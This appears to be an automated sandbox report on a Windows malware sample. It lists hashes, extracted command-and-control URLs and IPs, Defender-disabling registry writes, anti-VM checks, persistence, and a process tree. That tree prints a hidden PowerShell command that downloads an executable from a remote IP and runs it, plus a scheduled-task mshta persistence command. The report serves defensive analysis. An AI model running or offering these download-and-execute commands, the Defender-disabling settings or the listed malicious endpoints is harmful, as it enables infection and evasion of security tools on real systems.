Analysis
-
max time kernel
145s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
02/04/2025, 15:11
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
e9c3720b101e469f261fe20e246e3e97
-
SHA1
085847380cebb6beab8324221429deb9164b904b
-
SHA256
a6334a19d5f77be548a00862a4c9b5f0863575a2cd42e3a43aae2a8ab4280f55
-
SHA512
0b751fc5908808ffd0fc9b0a22908d8aa9599aedfbd71460a676dcab58365afaf9876895db2ea85c509fd606523189d2e9d7d6956cc9640ae1551c635e77e84d
-
SSDEEP
24576:kqDEvCTbMWu7rQYlBQcBiT6rprG8a0zu:kTvC/MTQYxsWR7a0z
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
gcleaner
185.156.73.98
45.91.200.135
Extracted
lumma
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://iqironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://starcloc.bet/GOksAo
https://madvennture.top/GKsiio
https://targett.top/dsANGt
https://qspacedbv.world/EKdlsk
https://igalxnetb.today/GsuIAo
https://hcosmosyf.top/GOsznj
https://ironloxp.live/aksdd
https://hywnnavstarx.shop/FoaJSi
https://advennture.top/GKsiio
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/5656-533-0x0000000000830000-0x0000000000C64000-memory.dmp healer behavioral1/memory/5656-534-0x0000000000830000-0x0000000000C64000-memory.dmp healer behavioral1/memory/5656-644-0x0000000000830000-0x0000000000C64000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 0f59d4b806.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 0f59d4b806.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 0f59d4b806.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 0f59d4b806.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 0f59d4b806.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 0f59d4b806.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 0f59d4b806.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 0f59d4b806.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 0f59d4b806.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 0f59d4b806.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 141b76bc55.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 607d38be61.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b2c8a4d481.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0f59d4b806.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 13 1380 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1380 powershell.exe -
Downloads MZ/PE file 10 IoCs
flow pid Process 31 4220 rapes.exe 31 4220 rapes.exe 31 4220 rapes.exe 31 4220 rapes.exe 31 4220 rapes.exe 31 4220 rapes.exe 31 4220 rapes.exe 177 2880 svchost015.exe 209 2856 svchost015.exe 13 1380 powershell.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5e35cdfe6b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5e35cdfe6b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0f59d4b806.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b2c8a4d481.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 607d38be61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 141b76bc55.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 141b76bc55.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 607d38be61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0f59d4b806.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b2c8a4d481.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation rapes.exe -
Executes dropped EXE 15 IoCs
pid Process 4532 Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE 4220 rapes.exe 1204 b2c8a4d481.exe 4592 rapes.exe 2880 svchost015.exe 3088 141b76bc55.exe 2856 svchost015.exe 6044 607d38be61.exe 6052 5e35cdfe6b.exe 720 4992f80afa.exe 5656 0f59d4b806.exe 5200 756b939269.exe 1296 ba60ba50d1.exe 3924 rapes.exe 8 rapes.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine b2c8a4d481.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 607d38be61.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 141b76bc55.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 0f59d4b806.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine rapes.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 0f59d4b806.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 0f59d4b806.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\607d38be61.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419750101\\607d38be61.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e35cdfe6b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419760101\\5e35cdfe6b.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4992f80afa.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419770101\\4992f80afa.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0f59d4b806.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419780101\\0f59d4b806.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00090000000242cb-154.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 4532 Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE 4220 rapes.exe 1204 b2c8a4d481.exe 4592 rapes.exe 3088 141b76bc55.exe 6044 607d38be61.exe 5656 0f59d4b806.exe 3924 rapes.exe 8 rapes.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1204 set thread context of 2880 1204 b2c8a4d481.exe 106 PID 3088 set thread context of 2856 3088 141b76bc55.exe 117 PID 5200 set thread context of 2956 5200 756b939269.exe 145 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 23 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 607d38be61.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 4992f80afa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 141b76bc55.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0f59d4b806.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4992f80afa.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 4992f80afa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ba60ba50d1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b2c8a4d481.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5e35cdfe6b.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5e35cdfe6b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 2648 taskkill.exe 3688 taskkill.exe 3984 taskkill.exe 3204 taskkill.exe 4132 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6132 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 41 IoCs
pid Process 1380 powershell.exe 1380 powershell.exe 4532 Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE 4532 Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE 4220 rapes.exe 4220 rapes.exe 1204 b2c8a4d481.exe 1204 b2c8a4d481.exe 4592 rapes.exe 4592 rapes.exe 3088 141b76bc55.exe 3088 141b76bc55.exe 6044 607d38be61.exe 6044 607d38be61.exe 6044 607d38be61.exe 6044 607d38be61.exe 6044 607d38be61.exe 6044 607d38be61.exe 6052 5e35cdfe6b.exe 6052 5e35cdfe6b.exe 720 4992f80afa.exe 720 4992f80afa.exe 5656 0f59d4b806.exe 5656 0f59d4b806.exe 720 4992f80afa.exe 720 4992f80afa.exe 5656 0f59d4b806.exe 5656 0f59d4b806.exe 5656 0f59d4b806.exe 2956 MSBuild.exe 2956 MSBuild.exe 2956 MSBuild.exe 2956 MSBuild.exe 1296 ba60ba50d1.exe 1296 ba60ba50d1.exe 1296 ba60ba50d1.exe 1296 ba60ba50d1.exe 3924 rapes.exe 3924 rapes.exe 8 rapes.exe 8 rapes.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 1380 powershell.exe Token: SeDebugPrivilege 2648 taskkill.exe Token: SeDebugPrivilege 3688 taskkill.exe Token: SeDebugPrivilege 3984 taskkill.exe Token: SeDebugPrivilege 3204 taskkill.exe Token: SeDebugPrivilege 4132 taskkill.exe Token: SeDebugPrivilege 3780 firefox.exe Token: SeDebugPrivilege 3780 firefox.exe Token: SeDebugPrivilege 5656 0f59d4b806.exe -
Suspicious use of FindShellTrayWindow 32 IoCs
pid Process 2988 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2988 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2988 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 720 4992f80afa.exe 720 4992f80afa.exe 720 4992f80afa.exe 720 4992f80afa.exe 720 4992f80afa.exe 720 4992f80afa.exe 720 4992f80afa.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 720 4992f80afa.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 720 4992f80afa.exe 720 4992f80afa.exe 720 4992f80afa.exe -
Suspicious use of SendNotifyMessage 26 IoCs
pid Process 2988 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2988 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2988 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 720 4992f80afa.exe 720 4992f80afa.exe 720 4992f80afa.exe 720 4992f80afa.exe 720 4992f80afa.exe 720 4992f80afa.exe 720 4992f80afa.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 720 4992f80afa.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 3780 firefox.exe 720 4992f80afa.exe 720 4992f80afa.exe 720 4992f80afa.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3780 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2988 wrote to memory of 5076 2988 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 2988 wrote to memory of 5076 2988 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 2988 wrote to memory of 5076 2988 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 2988 wrote to memory of 832 2988 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 2988 wrote to memory of 832 2988 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 2988 wrote to memory of 832 2988 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 5076 wrote to memory of 6132 5076 cmd.exe 89 PID 5076 wrote to memory of 6132 5076 cmd.exe 89 PID 5076 wrote to memory of 6132 5076 cmd.exe 89 PID 832 wrote to memory of 1380 832 mshta.exe 92 PID 832 wrote to memory of 1380 832 mshta.exe 92 PID 832 wrote to memory of 1380 832 mshta.exe 92 PID 1380 wrote to memory of 4532 1380 powershell.exe 102 PID 1380 wrote to memory of 4532 1380 powershell.exe 102 PID 1380 wrote to memory of 4532 1380 powershell.exe 102 PID 4532 wrote to memory of 4220 4532 Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE 103 PID 4532 wrote to memory of 4220 4532 Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE 103 PID 4532 wrote to memory of 4220 4532 Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE 103 PID 4220 wrote to memory of 1204 4220 rapes.exe 104 PID 4220 wrote to memory of 1204 4220 rapes.exe 104 PID 4220 wrote to memory of 1204 4220 rapes.exe 104 PID 1204 wrote to memory of 2880 1204 b2c8a4d481.exe 106 PID 1204 wrote to memory of 2880 1204 b2c8a4d481.exe 106 PID 1204 wrote to memory of 2880 1204 b2c8a4d481.exe 106 PID 1204 wrote to memory of 2880 1204 b2c8a4d481.exe 106 PID 1204 wrote to memory of 2880 1204 b2c8a4d481.exe 106 PID 1204 wrote to memory of 2880 1204 b2c8a4d481.exe 106 PID 1204 wrote to memory of 2880 1204 b2c8a4d481.exe 106 PID 1204 wrote to memory of 2880 1204 b2c8a4d481.exe 106 PID 1204 wrote to memory of 2880 1204 b2c8a4d481.exe 106 PID 4220 wrote to memory of 3088 4220 rapes.exe 111 PID 4220 wrote to memory of 3088 4220 rapes.exe 111 PID 4220 wrote to memory of 3088 4220 rapes.exe 111 PID 3088 wrote to memory of 2856 3088 141b76bc55.exe 117 PID 3088 wrote to memory of 2856 3088 141b76bc55.exe 117 PID 3088 wrote to memory of 2856 3088 141b76bc55.exe 117 PID 3088 wrote to memory of 2856 3088 141b76bc55.exe 117 PID 3088 wrote to memory of 2856 3088 141b76bc55.exe 117 PID 3088 wrote to memory of 2856 3088 141b76bc55.exe 117 PID 3088 wrote to memory of 2856 3088 141b76bc55.exe 117 PID 3088 wrote to memory of 2856 3088 141b76bc55.exe 117 PID 3088 wrote to memory of 2856 3088 141b76bc55.exe 117 PID 4220 wrote to memory of 6044 4220 rapes.exe 118 PID 4220 wrote to memory of 6044 4220 rapes.exe 118 PID 4220 wrote to memory of 6044 4220 rapes.exe 118 PID 4220 wrote to memory of 6052 4220 rapes.exe 119 PID 4220 wrote to memory of 6052 4220 rapes.exe 119 PID 4220 wrote to memory of 720 4220 rapes.exe 120 PID 4220 wrote to memory of 720 4220 rapes.exe 120 PID 4220 wrote to memory of 720 4220 rapes.exe 120 PID 720 wrote to memory of 2648 720 4992f80afa.exe 121 PID 720 wrote to memory of 2648 720 4992f80afa.exe 121 PID 720 wrote to memory of 2648 720 4992f80afa.exe 121 PID 720 wrote to memory of 3688 720 4992f80afa.exe 123 PID 720 wrote to memory of 3688 720 4992f80afa.exe 123 PID 720 wrote to memory of 3688 720 4992f80afa.exe 123 PID 720 wrote to memory of 3984 720 4992f80afa.exe 125 PID 720 wrote to memory of 3984 720 4992f80afa.exe 125 PID 720 wrote to memory of 3984 720 4992f80afa.exe 125 PID 720 wrote to memory of 3204 720 4992f80afa.exe 127 PID 720 wrote to memory of 3204 720 4992f80afa.exe 127 PID 720 wrote to memory of 3204 720 4992f80afa.exe 127 PID 720 wrote to memory of 4132 720 4992f80afa.exe 129 PID 720 wrote to memory of 4132 720 4992f80afa.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn l6KaEmalXaD /tr "mshta C:\Users\Admin\AppData\Local\Temp\a5p1F7bV7.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn l6KaEmalXaD /tr "mshta C:\Users\Admin\AppData\Local\Temp\a5p1F7bV7.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:6132
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\a5p1F7bV7.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Users\Admin\AppData\Local\Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE"C:\Users\Admin\AppData\Local\Temp4WM8YUEWXKVKCJWIUKFLVO04UGP0DBXS.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
